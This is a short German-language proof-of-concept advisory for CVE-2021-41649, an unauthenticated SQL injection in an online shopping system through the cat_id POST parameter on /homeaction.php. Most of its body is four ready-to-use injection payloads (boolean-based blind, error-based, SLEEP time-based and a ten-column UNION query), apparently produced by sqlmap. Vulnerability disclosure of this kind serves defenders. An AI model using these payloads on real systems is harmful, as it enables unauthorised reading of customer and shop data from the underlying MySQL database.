
Proof-of-Concept-Exploit für CVE-2021-41649, der eine nicht authentifizierte SQL-Injection im Online-Shopping-System über den cat_id-Parameter demonstriert, mit boolean-basierten, fehlerbasierten, zeitbasierten und UNION-Query-Payloads.
CVE-2021-41649 SQL-Injection im Online-Shopping-System
Das Online-Shopping-System ist anfällig für unauthentifizierte, fehler-/boolean-basierte blinde und fehlerbasierte SQL-Injection-Angriffe.
Der Parameter cat_id auf der Seite /homeaction.php bereinigt die Benutzereingaben nicht, ein Angreifer kann sensible Daten aus der zugrunde liegenden MySQL-Datenbank extrahieren.
URL: /homeaction.php
PARAMETER: cat_id
Parameter: cat_id (POST-Anfrage)
Typ: boolean-based blind
Titel: AND boolean-based blind - WHERE- oder HAVING-Klausel
Payload: cat_id=4' AND 9760=9760 AND 'ZCfc'='ZCfc&get_seleted_Category=1
Typ: error-based
Titel: MySQL >= 5.0 AND error-based - WHERE-, HAVING-, ORDER BY- oder GROUP BY-Klausel (FLOOR)
Payload: cat_id=4' AND (SELECT 4034 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (ELT(4034=4034,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'sGIO'='sGIO&get_seleted_Category=1
Typ: time-based blind
Titel: MySQL >= 5.0.12 AND time-based blind (Abfrage SLEEP)
Payload: cat_id=4' AND (SELECT 9762 FROM (SELECT(SLEEP(5)))PAcf) AND 'hpHO'='hpHO&get_seleted_Category=1
Typ: UNION-Abfrage
Titel: Generische UNION-Abfrage (NULL) - 10 Spalten
Payload: cat_id=4' UNION ALL SELECT CONCAT(0x71707a7171,0x746e4d4b5a706566596771585179566943487446575673515244507a52507345694d6b5a754d7049,0x71787a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&get_seleted_Category=1

Jason Colyvas
MOBIUSBINARY
21. September 2021